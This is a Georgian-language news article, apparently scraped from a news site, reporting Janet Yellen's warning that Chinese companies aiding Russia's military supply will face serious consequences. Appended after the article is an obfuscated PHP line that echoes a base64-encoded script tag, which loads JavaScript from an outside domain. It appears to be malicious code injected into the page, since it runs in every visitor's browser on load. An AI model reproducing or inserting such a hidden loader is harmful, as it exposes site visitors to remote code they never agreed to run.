celsiusi
ავერსი საქკაბელი

 აშშ ჩინურ კომპანიებს რუსეთის დახმარების შემთხვევაში მოსალოდნელი სერიოზული შედეგების შესახებ აფრთხილებს.

როგორ აშშ-ის სახაზინო მდივანმა, ჯანეტ იელენმა განაცხადა, ვაშინგტონმა იხილა მტკიცებულებები, რომ ჩინური კომპანიები შესაძლოა, რუსეთს სამხედრო საჭიროებებისთვის აღჭურვილობის მიწოდებაში ეხმარებიან, დასავლური სანქციების მიუხედავად. იელენმა ჩინეთს აღნიშნული ქმედებების აღკვეთისკენ მოუწოდა.

სან-ფრანცისკოში გამართულ პრესკონფერენციაზე სახაზინო მდივანმა თქვა, რომ მან ეს საკითხი ჩინეთის ვიცე-პრემიერთან,ჰე ლიფენთან ორდღიანი მოლაპარაკებების დროს დააყენა.

„მე ხაზი გავუსვი, რომ კომპანიებმა არ უნდა აღმოუჩინონ მატერიალური მხარდაჭერა რუსეთის ინდუსტრიულ სექტორს და რომ ამის გაკეთების შემთხვევაში, ისინი სეროზული შედეგების წინაშე აღმოჩნდებიან“, – განაცხადა იელენმა.

ამერიკელი მაღალჩინოსნის თქმით, აშშ-ს მტკიცედ აქვს გადაწყვეტილი, გააკეთოს ყველაფერი, რაც შეუძლია, რათა შეაჩეროს იმ მასალების ნაკადი, რომელიც რუსეთს ეხმარება სასტიკი და უკანონო ომის წარმოებაში.

ჯანეტ იელენის თქმით, აშშ-ის მთავრობამ უკვე დააწესა სანქციები რიგი ჩინური კერძო კომპანიების წინააღმდეგ, რომლებიც ეხმარებიან რუსეთს აღჭურვილობის მიღებაში.

„ჩვენ ვისურვებდით, რომ ჩინეთმა აღკვეთოს ეს, განსაკუთრებით, როდესაც ჩვენ შეგვიძლია ინფორმაციის მიწოდება“, – აღნიშნა იელენმა.

233
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");